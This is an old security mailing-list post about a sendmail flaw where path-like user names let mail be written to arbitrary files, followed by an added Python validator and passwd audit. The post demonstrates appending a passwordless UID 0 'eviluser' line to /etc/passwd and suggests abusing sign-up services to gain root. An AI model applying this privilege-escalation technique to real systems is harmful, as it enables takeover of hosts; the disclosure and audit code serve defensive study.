Date: 12/28/97 5:33:27 AM
From: Duck Vader
Subject: BoS: Sendmail quirks
To: (""@LOCAL)

Going through my mail the other day, I noticed some junk mail from
..@somehost, and wondered what would happen if I had a user by the same
name. Well, it seems sendmail will readily write to a path in the username
as long as it doesn't begin with a forward slash. A few quick examples:

thePond:~# cat /etc/passwd | grep ../
../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
thePond:~# ls -l /var/a
-rw------- 1 ../../a users 0 Nov 23 12:14 /var/a

thePond:/var/spool# ls -ld atjobs
drwxr-xr-x 2 root root 1024 Nov 23 11:55 atjobs
thePond:/var/spool# cat /etc/passwd | grep atjobs
../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
thePond:/var/spool# ls -l
total 16
drwxr-xr-x 2 root root 1024 Nov 23 11:55 BOGUS.EYF
-rw------- 1 ../atjob users 0 Nov 23 12:20 atjobs

Yes, you can precede the pathname with a forward slash.

thePond:~# cat /etc/passwd | grep passwd
/etc/passwd:*:515:100:tmp:/home/tmp:
thePond:~# cat /etc/passwd
root:*:0:0:root:/root:/bin/tcsh
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
[Edited out more passwords..]
>From root Tue Nov 25 20:44:00 1997
To: /etc/passwd
eviluser::0:0:Sendmail quirks:/root:/bin/tcsh

This probably will not be a problem for the average user. However, BBSes
and free email services often let the user select his own username, and
will add him to /etc/passwd for email and whatnot. If I ran into a site
that did this, I could just specify my login as /etc/passwd and write
myself a new username, this time with UID:GID 0:0 :)

*---------------------------------*
| tiepilot - The Duck Jedi Master |
|                                 |
| duckvader@quackquack.com        |
| tiepilot@thepentagon.com        |
*---------------------------------*

Never put off till tomorrow what you can avoid all together.

Hacker's Law: The belief that enhanced understanding will necessarily stir
a nation to action is one of mankind's oldest illusions.
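
Added example, not part of the original post: a Python check that a sign-up service could run before adding a user-chosen login to /etc/passwd, plus an audit that flags the conditions shown in the listings above (path-like login names, mail text written into the file, an extra UID 0 entry, an empty password field). The naming policy, the function names and the combined sample file are assumptions of this example.

```python
import re

# Assumed naming policy for self-service sign-ups (not taken from the post).
SAFE_NAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def is_safe_username(name):
    """True only for names that cannot be read as a file path."""
    return SAFE_NAME.fullmatch(name) is not None


def audit_passwd(text):
    """Return (line_number, reason) findings for passwd-format text."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            # Mail headers or body text delivered into the file land here.
            findings.append((number, "malformed line (not 7 fields)"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if "/" in name:
            findings.append((number, "login name contains '/'"))
        elif not is_safe_username(name):
            findings.append((number, "login name outside allowed set"))
        if uid == "0" and name != "root":
            findings.append((number, "extra UID 0 account"))
        if password == "":
            findings.append((number, "empty password field"))
    return findings


# Constructed sample: entries quoted in the post, combined into one file.
SAMPLE = """\
root:*:0:0:root:/root:/bin/tcsh
bin:*:1:1:bin:/bin:
../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
/etc/passwd:*:515:100:tmp:/home/tmp:
From root Tue Nov 25 20:44:00 1997
To: /etc/passwd
eviluser::0:0:Sendmail quirks:/root:/bin/tcsh
"""

if __name__ == "__main__":
    for number, reason in audit_passwd(SAMPLE):
        print(f"line {number}: {reason}")
```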